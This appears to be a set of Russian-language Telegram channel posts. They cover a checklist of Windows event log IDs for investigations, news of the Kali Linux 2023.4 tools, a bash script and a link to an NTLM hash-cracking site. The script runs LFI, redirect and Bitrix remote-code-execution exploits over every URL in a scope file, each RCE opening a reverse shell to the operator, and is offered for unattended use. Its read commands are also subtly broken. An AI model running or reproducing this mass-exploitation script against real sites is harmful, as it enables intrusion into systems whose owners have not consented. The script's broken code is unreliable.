🧃 Немного сока — Основные ID Событий в Журнале Windows

При проведении расследований на компьютерах Windows, ключевым аспектом является анализ журналов событий. Эти журналы предоставляют обширные данные, которые могут помочь выявить необычные или подозрительные действия.
Расположение журнала:

C:\Windows\System32\winevt\Logs 

Вот чек лист основных ID событий, на которые следует обратить внимание:

✖️ Служба Windows BITS(хождение по http):

3: Создание нового BITS задания.
4: BITS задание выполнено.
5: BITS задание завершено.
59: BITS начала выполнение задания.
60: BITS остановила выполнение задания.

✖️ События локальных сессий(по журналу Local Session Manager):

21: Успешный вход в систему.
22: Получено уведомление о запуске оболочки.
23: Успешный выход из сеанса.
24: Сеанс был отключен.
25: Успешное переподключение сеанса.

✖️ Операции с задачами(журнал событий отложенных задач Task Scheduler):

100: Начало выполнения задачи.
102: Задача завершена.
106: Задача зарегистрирована.

📌

Журнал по умолчанию выключен.

✖️ События операций RDP(по журналу Remote Connection Manager):

1149: Успешная проверка подлинности пользователя.
1102: Начало много-транспортного соединения с сервером.
1024-1026: События подключения и отключения RDP.

✖️ События безопасности

4624: Успешный вход учетной записи.
4625: Ошибка входа учетной записи.
4634-4722: События учетных записей и их изменения.

✖️ Анализ операций Windows Defender

5007: Изменение конфигурации Windows Defender.
1116: Обнаружение вредоносного ПО.
1117: Действия по защите компьютера.

✖️ Активность в WMI(журнал WMI-Activity):

5861: Подписка на события.
5860: WMI запрос.
5857: Запуск провайдера.

✖️ События работы со службами

7030: Ошибка создания службы.
7045: Служба создана.

✖️ Операции в PowerShell

600: Стартовал поставщик "Variable".
4103-4104: Выполнение модулей и создание скриптов. (Необходимо включить данное логирование)


#purpleteam #soc

Вышла Kali Linux 2023.4 с 15 новыми инструментами

Разработчики представили Kali Linux 2023.4, четвертую и последнюю версию дистрибутива в 2023 году. Новинка уже доступна для загрузки, содержит сразу 15 новых инструментов и GNOME 45.

Команда Offensive Security сообщает, что в финальном релизе этого года в ОС добавлено не так много новых функций, зато версия ядра обновлена до версии 6.3.7, а также появились сразу 15 новых инструментов:

cabby — имплементация клиента TAXII;
cti-taxii-client — библиотека клиента TAXII 2;
enum4linux-ng — следующее поколение enum4linux с дополнительными возможностями (инструмент энумерации Windows/Samba);
exiflooter — поиск геолокации по всем URL-адресам и каталогам изображений;
h8mail — email OSINT и инструмент для поиска утечек паролей;
Havoc — современная и гибкая система управления и контроля для пост-эксплуатации;
OpenTAXII — имплементация сервера TAXII;
PassDetective — сканирование истории shell-команд для обнаружения случайно записанных паролей, API-ключей и секретов;
Portspoof — все 65535 TCP портов всегда открыты и эмулируют сервисы;
Raven — легкий HTTP-сервис загрузки файлов;
ReconSpider — продвинутый фреймворк для OSINT;
rling — RLI Next Gen (Rling), более быстрая многопоточная и многофункциональная альтернатива rli;
Sigma-Cli — список и преобразование правил Sigma в языки запросов;
sn0int — полуавтоматический OSINT-фреймворк и менеджер пакетов;
SPIRE — набор API-интерфейсов SPIFFE Runtime Environment для установления доверия между программными системами.

📌 Я лично заинтересован в enum4linux-ng, h8mail, Havoc и Portspoof.

Если вы тоже не знаете, что такое TAXII, вы не одни такие :D. Вот что это:
TAXII – это протокол, определяющий способы обмена информацией о киберугрозах через службы и средства обмена сообщениями (RESTful API), и набор требований для клиента и сервера. В TAXII поддерживаются две основные модели обмена информации об угрозах – Collection и Channel. 😉

🌚 @poxek

🔥 quick-trics_auto.sh

Когда-то я выкладывал пост про интересную тулзу для быстрой проверки Bitrix на наличие простых уязвимостей. И я писал, что мол написал скрипт, но с вами им не поделился 🌚
Исправляюсь! Переписал скрипт, теперь он будет бегать по всем урлам построчно и проверять на всё что только можно из этого инструмента, кроме XSS, т.к. модуль фолзит, из-за того, что нагрузка тупо вставляется и если 200, то он пишет что якобы XSS нашёл, но в 99,999% случаев, сайт просто проглотит нагрузку и ничего не случиться.

#!/bin/bash
echo "Lauch netcat for revshells"
printf "Enter IP ($(curl -s 2ip.ru)): "
read $IP
printf "Enter Port: "
read $PORT

for ((i=1; i <= $(wc -l scope.txt | awk '{print $1;}'); i++))
do
        quick-tricks spoofing -u $(sed -n "$i p" scope.txt)
        quick-tricks redirect -u $(sed -n "$i p" scope.txt)
        quick-tricks lfi -u $(sed -n "$i p" scope.txt)
        quick-tricks recon -a -u $(sed -n "$i p" scope.txt)
        quick-tricks rce vote-agent -u $(sed -n "$i p" scope.txt) --lhost $IP --lport $PORT --agentId 2
        quick-tricks rce vote-agent -u $(sed -n "$i p" scope.txt) --lhost $IP --lport $PORT --agentId 4
        quick-tricks rce vote-agent -u $(sed -n "$i p" scope.txt) --lhost $IP --lport $PORT --agentId 7
        quick-tricks rce html-editor -u $(sed -n "$i p" scope.txt) --lhost $IP --lport $PORT
done

🍷 Написал скрипт так, чтобы вы его просто запустили, а дальше ушли пить чай.

Но скорее всего у вас вообще не окажется quick-tricks, т.к. автор зачем-то удалил/скрыл репозиторий. Поэтому к этому посту я прикреплю бинарь этого инструмента под Linux.

🌚 @poxek

NTLM to password
#windows

https://ntlm.pw/

thx snovvcrash

🌚 @poxek